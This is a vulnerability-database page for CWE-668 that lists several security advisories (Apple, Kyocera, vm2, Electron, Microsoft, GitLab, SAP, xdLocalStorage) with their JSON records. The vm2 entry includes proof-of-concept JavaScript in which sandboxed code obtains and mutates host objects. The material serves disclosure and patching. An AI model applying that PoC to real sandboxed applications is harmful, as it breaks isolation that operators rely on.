Common Weakness Enumeration

CWE-668

Discouraged

Exposure of Resource to Wrong Sphere

Abstraction: Class · Status: Draft

The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource.

1252 vulnerabilities reference this CWE, most recent first.

GHSA-MMW9-5M6W-W9P6

Vulnerability from github – Published: 2022-03-19 00:00 – Updated: 2022-03-27 00:00
VLAI
Details

The GSMA authentication panel could be presented on the lock screen. The issue was resolved by requiring device unlock to interact with the GSMA authentication panel. This issue is fixed in iOS 15.4 and iPadOS 15.4. A person with physical access may be able to view and modify the carrier account information and settings from the lock screen.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-22652"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-03-18T18:15:00Z",
    "severity": "MODERATE"
  },
  "details": "The GSMA authentication panel could be presented on the lock screen. The issue was resolved by requiring device unlock to interact with the GSMA authentication panel. This issue is fixed in iOS 15.4 and iPadOS 15.4. A person with physical access may be able to view and modify the carrier account information and settings from the lock screen.",
  "id": "GHSA-mmw9-5m6w-w9p6",
  "modified": "2022-03-27T00:00:45Z",
  "published": "2022-03-19T00:00:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22652"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/HT213182"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MP3J-MVWR-J4C4

Vulnerability from github – Published: 2023-04-13 06:30 – Updated: 2024-04-04 03:25
VLAI
Details

KYOCERA Mobile Print' v3.2.0.230119 and earlier, 'UTAX/TA MobilePrint' v3.2.0.230119 and earlier, and 'Olivetti Mobile Print' v3.2.0.230119 and earlier are vulnerable to improper intent handling. When a malicious app is installed on the victim user's Android device, the app may send an intent and direct the affected app to download malicious files or apps to the device without notification.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-25954"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-04-13T04:15:00Z",
    "severity": "MODERATE"
  },
  "details": "KYOCERA Mobile Print\u0027 v3.2.0.230119 and earlier, \u0027UTAX/TA MobilePrint\u0027 v3.2.0.230119 and earlier, and \u0027Olivetti Mobile Print\u0027 v3.2.0.230119 and earlier are vulnerable to improper intent handling. When a malicious app is installed on the victim user\u0027s Android device, the app may send an intent and direct the affected app to download malicious files or apps to the device without notification.",
  "id": "GHSA-mp3j-mvwr-j4c4",
  "modified": "2024-04-04T03:25:49Z",
  "published": "2023-04-13T06:30:16Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25954"
    },
    {
      "type": "WEB",
      "url": "https://jvn.jp/en/vu/JVNVU98434809"
    },
    {
      "type": "WEB",
      "url": "https://play.google.com/store/apps/details?id=com.kyocera.kyoprint"
    },
    {
      "type": "WEB",
      "url": "https://play.google.com/store/apps/details?id=com.kyocera.kyoprintolivetti"
    },
    {
      "type": "WEB",
      "url": "https://play.google.com/store/apps/details?id=com.kyocera.kyoprinttautax"
    },
    {
      "type": "WEB",
      "url": "https://www.kyoceradocumentsolutions.com/en/our-business/security/information/2023-04-11.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MPF8-4HX2-7CJG

Vulnerability from github – Published: 2026-05-07 04:29 – Updated: 2026-05-14 20:36
VLAI
Summary
vm2 Host Promise Resolution Preserves Object Identity Across Sandbox Boundary
Details

Summary

A sandbox boundary violation in vm2 allows host object identity to cross into the sandbox through host Promise resolution.

When a host-side Promise that resolves to a host object is exposed to the sandbox, the value delivered to the sandbox .then() callback preserves host identity. This allows the sandbox to interact with the host object directly, including:

  • Performing identity checks using host-side WeakMap
  • Mutating host object state from inside the sandbox

This behavior occurs because the Promise fulfillment wrapper uses ensureThis() instead of the stronger cross-realm conversion path (from() / proxy wrapping). If no prototype mapping is found, ensureThis() returns the original object.

As a result, objects resolved by host Promises can cross the sandbox boundary without proper isolation.


Details

In setup-sandbox.js, vm2 wraps Promise.prototype.then:

```js globalPromise.prototype.then = function then(onFulfilled, onRejected) { resetPromiseSpecies(this);

if (typeof onFulfilled === 'function') { const origOnFulfilled = onFulfilled; onFulfilled = function onFulfilled(value) { value = ensureThis(value); return apply(origOnFulfilled, this, [value]); }; }

return apply(globalPromiseThen, this, [onFulfilled, onRejected]); };

The wrapper calls ensureThis(value) before invoking the sandbox callback.

However, ensureThis is implemented in bridge.js as thisEnsureThis():

function thisEnsureThis(other) { const type = typeof other;

switch (type) { case 'object': if (other === null) return null;

case 'function':
  let proto = thisReflectGetPrototypeOf(other);

  if (!proto) {
    return other;
  }

  while (proto) {
    const mapping = thisReflectApply(thisMapGet, protoMappings, [proto]);

    if (mapping) {
      const mapped = thisReflectApply(thisWeakMapGet, mappingOtherToThis, [other]);
      if (mapped) return mapped;
      return mapping(defaultFactory, other);
    }

    proto = thisReflectGetPrototypeOf(proto);
  }

  return other;

If no prototype mapping is found, ensureThis() simply returns the original object:

return other;

This means the sandbox receives the original host object instead of a proxied or sanitized representation.

Because of this behavior, values resolved by host Promises can cross the host–sandbox boundary with identity preserved.

PoC

The following Proof of Concept demonstrates that an object resolved by a host Promise can be used as a valid key in a host-side WeakMap from inside the sandbox.

WeakMap keys rely on reference identity, so a successful lookup proves that the sandbox received the host object identity.

PoC Code import {VM} from "./index.js";

const hostObj = {tag: "HOST_OBJ"}; const hostPromise = Promise.resolve(hostObj);

// WeakMap created on the host const wm = new WeakMap([[hostObj, "HIT"]]);

const vm = new VM({ sandbox: {hostPromise, wm}, timeout: 1000, eval: false, wasm: false, });

const code = hostPromise.then(v => ({ weakMapGet: wm.get(v), typeofV: typeof v, tag: v.tag }));

const result = await vm.run(code);

console.log("VM RESULT:", result); console.log("HOST SAME KEY STILL:", wm.get(hostObj)); Output VM RESULT: { weakMapGet: 'HIT', typeofV: 'object', tag: 'HOST_OBJ' } HOST SAME KEY STILL: HIT

This confirms that the object delivered to the sandbox callback retains host identity.

Additional Demonstration: Host Object Mutation

The sandbox can also mutate host object state through the resolved Promise value.

import {VM} from "./index.js";

const hostObj = {tag: "HOST_OBJ", nested: {x: 1}}; const hostPromise = Promise.resolve(hostObj);

const vm = new VM({ sandbox: {hostPromise}, timeout: 1000, eval: false, wasm: false, });

const code = hostPromise.then(v => { v.nested.x = 999; v.tag = "MUTATED"; return { seenTag: v.tag, seenX: v.nested.x }; });

const result = await vm.run(code);

console.log("VM RESULT:", result); console.log("HOST AFTER:", hostObj);

Output: VM RESULT: { seenTag: 'MUTATED', seenX: 999 } HOST AFTER: { tag: 'MUTATED', nested: { x: 999 } }

This demonstrates write-through mutation of a host object from sandbox code.

Impact This vulnerability allows host object references to cross the vm2 sandbox boundary via Promise resolution.

Consequences include:

Host object identity disclosure

Write-through mutation of host objects

WeakMap / WeakSet identity oracle across the boundary

Potential capability leaks if sensitive host objects are reachable via Promises

Applications that expose host Promises to sandboxed code may unintentionally grant the sandbox direct access to host objects.

This weakens the intended isolation guarantees of vm2.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.10.5"
      },
      "package": {
        "ecosystem": "npm",
        "name": "vm2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.11.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44000"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668",
      "CWE-693"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-07T04:29:22Z",
    "nvd_published_at": "2026-05-13T18:16:16Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nA sandbox boundary violation in **vm2** allows host object identity to cross into the sandbox through host Promise resolution.\n\nWhen a host-side Promise that resolves to a host object is exposed to the sandbox, the value delivered to the sandbox `.then()` callback preserves host identity. This allows the sandbox to interact with the host object directly, including:\n\n- Performing identity checks using host-side `WeakMap`\n- Mutating host object state from inside the sandbox\n\nThis behavior occurs because the Promise fulfillment wrapper uses `ensureThis()` instead of the stronger cross-realm conversion path (`from()` / proxy wrapping). If no prototype mapping is found, `ensureThis()` returns the original object.\n\nAs a result, objects resolved by host Promises can cross the sandbox boundary without proper isolation.\n\n---\n\n### Details\n\nIn `setup-sandbox.js`, vm2 wraps `Promise.prototype.then`:\n\n```js\nglobalPromise.prototype.then = function then(onFulfilled, onRejected) {\n  resetPromiseSpecies(this);\n\n  if (typeof onFulfilled === \u0027function\u0027) {\n    const origOnFulfilled = onFulfilled;\n    onFulfilled = function onFulfilled(value) {\n      value = ensureThis(value);\n      return apply(origOnFulfilled, this, [value]);\n    };\n  }\n\n  return apply(globalPromiseThen, this, [onFulfilled, onRejected]);\n};\n\n\nThe wrapper calls ensureThis(value) before invoking the sandbox callback.\n\nHowever, ensureThis is implemented in bridge.js as thisEnsureThis():\n\nfunction thisEnsureThis(other) {\n  const type = typeof other;\n\n  switch (type) {\n    case \u0027object\u0027:\n      if (other === null) return null;\n\n    case \u0027function\u0027:\n      let proto = thisReflectGetPrototypeOf(other);\n\n      if (!proto) {\n        return other;\n      }\n\n      while (proto) {\n        const mapping = thisReflectApply(thisMapGet, protoMappings, [proto]);\n\n        if (mapping) {\n          const mapped = thisReflectApply(thisWeakMapGet, mappingOtherToThis, [other]);\n          if (mapped) return mapped;\n          return mapping(defaultFactory, other);\n        }\n\n        proto = thisReflectGetPrototypeOf(proto);\n      }\n\n      return other;\n\nIf no prototype mapping is found, ensureThis() simply returns the original object:\n\nreturn other;\n\nThis means the sandbox receives the original host object instead of a proxied or sanitized representation.\n\nBecause of this behavior, values resolved by host Promises can cross the host\u2013sandbox boundary with identity preserved.\n\nPoC\n\nThe following Proof of Concept demonstrates that an object resolved by a host Promise can be used as a valid key in a host-side WeakMap from inside the sandbox.\n\nWeakMap keys rely on reference identity, so a successful lookup proves that the sandbox received the host object identity.\n\nPoC Code\nimport {VM} from \"./index.js\";\n\nconst hostObj = {tag: \"HOST_OBJ\"};\nconst hostPromise = Promise.resolve(hostObj);\n\n// WeakMap created on the host\nconst wm = new WeakMap([[hostObj, \"HIT\"]]);\n\nconst vm = new VM({\n  sandbox: {hostPromise, wm},\n  timeout: 1000,\n  eval: false,\n  wasm: false,\n});\n\nconst code = `\n  hostPromise.then(v =\u003e ({\n    weakMapGet: wm.get(v),\n    typeofV: typeof v,\n    tag: v.tag\n  }))\n`;\n\nconst result = await vm.run(code);\n\nconsole.log(\"VM RESULT:\", result);\nconsole.log(\"HOST SAME KEY STILL:\", wm.get(hostObj));\nOutput\nVM RESULT: { weakMapGet: \u0027HIT\u0027, typeofV: \u0027object\u0027, tag: \u0027HOST_OBJ\u0027 }\nHOST SAME KEY STILL: HIT\n\nThis confirms that the object delivered to the sandbox callback retains host identity.\n\nAdditional Demonstration: Host Object Mutation\n\nThe sandbox can also mutate host object state through the resolved Promise value.\n\nimport {VM} from \"./index.js\";\n\nconst hostObj = {tag: \"HOST_OBJ\", nested: {x: 1}};\nconst hostPromise = Promise.resolve(hostObj);\n\nconst vm = new VM({\n  sandbox: {hostPromise},\n  timeout: 1000,\n  eval: false,\n  wasm: false,\n});\n\nconst code = `\n  hostPromise.then(v =\u003e {\n    v.nested.x = 999;\n    v.tag = \"MUTATED\";\n    return { seenTag: v.tag, seenX: v.nested.x };\n  })\n`;\n\nconst result = await vm.run(code);\n\nconsole.log(\"VM RESULT:\", result);\nconsole.log(\"HOST AFTER:\", hostObj);\n\n**Output:**\nVM RESULT: { seenTag: \u0027MUTATED\u0027, seenX: 999 }\nHOST AFTER: { tag: \u0027MUTATED\u0027, nested: { x: 999 } }\n\nThis demonstrates write-through mutation of a host object from sandbox code.\n\n**Impact**\nThis vulnerability allows host object references to cross the vm2 sandbox boundary via Promise resolution.\n\nConsequences include:\n\nHost object identity disclosure\n\nWrite-through mutation of host objects\n\nWeakMap / WeakSet identity oracle across the boundary\n\nPotential capability leaks if sensitive host objects are reachable via Promises\n\nApplications that expose host Promises to sandboxed code may unintentionally grant the sandbox direct access to host objects.\n\nThis weakens the intended isolation guarantees of vm2.",
  "id": "GHSA-mpf8-4hx2-7cjg",
  "modified": "2026-05-14T20:36:48Z",
  "published": "2026-05-07T04:29:22Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-mpf8-4hx2-7cjg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44000"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/patriksimek/vm2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "vm2 Host Promise Resolution Preserves Object Identity Across Sandbox Boundary"
}

GHSA-MPJM-V997-C4H4

Vulnerability from github – Published: 2021-10-12 21:59 – Updated: 2022-08-11 16:56
VLAI
Summary
Electron's sandboxed renderers can obtain thumbnails of arbitrary files through the nativeImage API
Details

Impact

This vulnerability allows a sandboxed renderer to request a "thumbnail" image of an arbitrary file on the user's system. The thumbnail can potentially include significant parts of the original file, including textual data in many cases.

All current stable versions of Electron are affected.

Patches

This was fixed with #30728, and the following Electron versions contain the fix:

  • 15.0.0-alpha.10
  • 14.0.0
  • 13.3.0
  • 12.1.0
  • 11.5.0

Workarounds

If your app enables contextIsolation, this vulnerability is significantly more difficult for an attacker to exploit.

Further, if your app does not depend on the createThumbnailFromPath API, then you can simply disable the functionality. In the main process, before the 'ready' event:

delete require('electron').nativeImage.createThumbnailFromPath

For more information

If you have any questions or comments about this advisory, email us at security@electronjs.org.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "electron"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "11.5.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "electron"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "12.0.0"
            },
            {
              "fixed": "12.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "electron"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "13.0.0"
            },
            {
              "fixed": "13.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-39184"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668",
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-10-12T18:54:44Z",
    "nvd_published_at": "2021-10-12T19:15:00Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\nThis vulnerability allows a sandboxed renderer to request a \"thumbnail\" image of an arbitrary file on the user\u0027s system. The thumbnail can potentially include significant parts of the original file, including textual data in many cases.\n\nAll current stable versions of Electron are affected.\n\n### Patches\nThis was fixed with #30728, and the following Electron versions contain the fix:\n\n- 15.0.0-alpha.10\n- 14.0.0\n- 13.3.0\n- 12.1.0\n- 11.5.0\n\n### Workarounds\nIf your app enables `contextIsolation`, this vulnerability is significantly more difficult for an attacker to exploit.\n\nFurther, if your app does not depend on the `createThumbnailFromPath` API, then you can simply disable the functionality. In the main process, before the \u0027ready\u0027 event:\n```js\ndelete require(\u0027electron\u0027).nativeImage.createThumbnailFromPath\n```\n\n### For more information\nIf you have any questions or comments about this advisory, email us at [security@electronjs.org](mailto:security@electronjs.org).",
  "id": "GHSA-mpjm-v997-c4h4",
  "modified": "2022-08-11T16:56:02Z",
  "published": "2021-10-12T21:59:13Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/electron/electron/security/advisories/GHSA-mpjm-v997-c4h4"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39184"
    },
    {
      "type": "WEB",
      "url": "https://github.com/electron/electron/pull/30728"
    },
    {
      "type": "WEB",
      "url": "https://github.com/electron/electron/pull/30728/commits/8fed645bd671f359ee52d806c075ec4e07eda17f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/electron/electron"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Electron\u0027s sandboxed renderers can obtain thumbnails of arbitrary files through the nativeImage API"
}

GHSA-MPX3-9HC8-9X6P

Vulnerability from github – Published: 2023-09-12 18:30 – Updated: 2024-04-04 07:38
VLAI
Details

DHCP Server Service Information Disclosure Vulnerability

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-38152"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-09-12T17:15:18Z",
    "severity": "MODERATE"
  },
  "details": "DHCP Server Service Information Disclosure Vulnerability",
  "id": "GHSA-mpx3-9hc8-9x6p",
  "modified": "2024-04-04T07:38:06Z",
  "published": "2023-09-12T18:30:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38152"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-38152"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MQ8J-3H7H-P8G7

Vulnerability from github – Published: 2022-06-16 23:14 – Updated: 2022-06-16 23:14
VLAI
Summary
Compromised child renderer processes could obtain IPC access without nodeIntegrationInSubFrames being enabled
Details

Impact

This vulnerability allows a renderer with JS execution to obtain access to a new renderer process with nodeIntegrationInSubFrames enabled which in turn allows effective access to ipcRenderer.

Please note the misleadingly named nodeIntegrationInSubFrames option does not implicitly grant Node.js access rather it depends on the existing sandbox setting. If your application is sandboxed then nodeIntegrationInSubFrames just gives access to the sandboxed renderer APIs (which includes ipcRenderer).

If your application then additionally exposes IPC messages without IPC senderFrame validation that perform privileged actions or return confidential data this access to ipcRenderer can in turn compromise your application / user even with the sandbox enabled.

Patches

This has been patched and the following Electron versions contain the fix:

  • 18.0.0-beta.6
  • 17.2.0
  • 16.2.6
  • 15.5.5

Workarounds

Ensure that all IPC message handlers appropriately validate senderFrame as per our security tutorial here.

For more information

If you have any questions or comments about this advisory, email us at security@electronjs.org.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "electron"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "15.5.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "electron"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "16.0.0"
            },
            {
              "fixed": "16.2.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "electron"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "17.0.0"
            },
            {
              "fixed": "17.2.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 18.0.0-beta.5"
      },
      "package": {
        "ecosystem": "npm",
        "name": "electron"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "18.0.0-beta.1"
            },
            {
              "fixed": "18.0.0-beta.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-29247"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-06-16T23:14:33Z",
    "nvd_published_at": "2022-06-13T21:15:00Z",
    "severity": "LOW"
  },
  "details": "### Impact\nThis vulnerability allows a renderer with JS execution to obtain access to a new renderer process with `nodeIntegrationInSubFrames` enabled which in turn allows effective access to `ipcRenderer`.\n\nPlease note the misleadingly named `nodeIntegrationInSubFrames` option does not implicitly grant Node.js access rather it depends on the existing `sandbox` setting.  If your application is sandboxed then `nodeIntegrationInSubFrames` just gives access to the sandboxed renderer APIs (which includes `ipcRenderer`).\n\nIf your application then additionally exposes IPC messages without IPC `senderFrame` validation that perform privileged actions or return confidential data this access to `ipcRenderer` can in turn compromise your application / user even with the sandbox enabled.\n\n### Patches\nThis has been patched and the following Electron versions contain the fix:\n\n* `18.0.0-beta.6`\n* `17.2.0`\n* `16.2.6`\n* `15.5.5`\n\n### Workarounds\nEnsure that all IPC message handlers appropriately validate `senderFrame` as per our [security tutorial here](https://github.com/electron/electron/blob/main/docs/tutorial/security.md#17-validate-the-sender-of-all-ipc-messages).\n\n### For more information\n\nIf you have any questions or comments about this advisory, email us at [security@electronjs.org](mailto:security@electronjs.org).",
  "id": "GHSA-mq8j-3h7h-p8g7",
  "modified": "2022-06-16T23:14:33Z",
  "published": "2022-06-16T23:14:33Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/electron/electron/security/advisories/GHSA-mq8j-3h7h-p8g7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-29247"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/electron/electron"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Compromised child renderer processes could obtain IPC access without nodeIntegrationInSubFrames being enabled"
}

GHSA-MQ9G-JW9V-3PCF

Vulnerability from github – Published: 2022-05-24 19:16 – Updated: 2022-07-13 00:01
VLAI
Details

In all versions of GitLab EE since version 8.13, an endpoint discloses names of private groups that have access to a project to low privileged users that are part of that project.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-39884"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-10-05T13:15:00Z",
    "severity": "MODERATE"
  },
  "details": "In all versions of GitLab EE since version 8.13, an endpoint discloses names of private groups that have access to a project to low privileged users that are part of that project.",
  "id": "GHSA-mq9g-jw9v-3pcf",
  "modified": "2022-07-13T00:01:38Z",
  "published": "2022-05-24T19:16:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39884"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/447817"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-39884.json"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/25414"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MQM8-93XW-F4W3

Vulnerability from github – Published: 2022-01-15 00:01 – Updated: 2022-10-06 18:52
VLAI
Details

In SAP NetWeaver AS for ABAP and ABAP Platform - versions 701, 702, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, 756, 786, an attacker authenticated as a regular user can use the S/4 Hana dashboard to reveal systems and services which they would not normally be allowed to see. No information alteration or denial of service is possible.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-42067"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-01-14T20:15:00Z",
    "severity": "MODERATE"
  },
  "details": "In SAP NetWeaver AS for ABAP and ABAP Platform - versions 701, 702, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, 756, 786, an attacker authenticated as a regular user can use the S/4 Hana dashboard to reveal systems and services which they would not normally be allowed to see. No information alteration or denial of service is possible.",
  "id": "GHSA-mqm8-93xw-f4w3",
  "modified": "2022-10-06T18:52:11Z",
  "published": "2022-01-15T00:01:16Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-42067"
    },
    {
      "type": "WEB",
      "url": "https://launchpad.support.sap.com/#/notes/3112710"
    },
    {
      "type": "WEB",
      "url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=596902035"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MR4R-VFMP-V9Q3

Vulnerability from github – Published: 2023-02-14 21:30 – Updated: 2023-02-14 21:30
VLAI
Details

HTTP.sys Information Disclosure Vulnerability

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-21687"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-02-14T20:15:00Z",
    "severity": "MODERATE"
  },
  "details": "HTTP.sys Information Disclosure Vulnerability",
  "id": "GHSA-mr4r-vfmp-v9q3",
  "modified": "2023-02-14T21:30:30Z",
  "published": "2023-02-14T21:30:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-21687"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21687"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MR5M-2385-2VCP

Vulnerability from github – Published: 2022-05-24 17:13 – Updated: 2023-07-17 18:29
VLAI
Summary
xdlocalstorage does not verify request origin
Details

An issue was discovered in xdLocalStorage through 2.0.5. The postData() function in xdLocalStoragePostMessageApi.js specifies the wildcard (*) as the targetOrigin when calling the postMessage() function on the parent object. Therefore any domain can load the application hosting the "magical iframe" and receive the messages that the "magical iframe" sends.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "xdlocalstorage"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.0.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-11610"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-07-17T18:29:36Z",
    "nvd_published_at": "2020-04-07T18:15:00Z",
    "severity": "HIGH"
  },
  "details": "An issue was discovered in xdLocalStorage through 2.0.5. The `postData()` function in `xdLocalStoragePostMessageApi.js` specifies the wildcard (`*`) as the targetOrigin when calling the `postMessage()` function on the parent object. Therefore any domain can load the application hosting the \"magical iframe\" and receive the messages that the \"magical iframe\" sends.",
  "id": "GHSA-mr5m-2385-2vcp",
  "modified": "2023-07-17T18:29:36Z",
  "published": "2022-05-24T17:13:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11610"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ofirdagan/cross-domain-local-storage/issues/17"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ofirdagan/cross-domain-local-storage/pull/19"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ofirdagan/cross-domain-local-storage"
    },
    {
      "type": "WEB",
      "url": "https://grimhacker.com/exploiting-xdlocalstorage-localstorage-and-postmessage/#Missing-TargetOrigin-Magic-iframe"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "xdlocalstorage does not verify request origin"
}

No mitigation information available for this CWE.

No CAPEC attack patterns related to this CWE.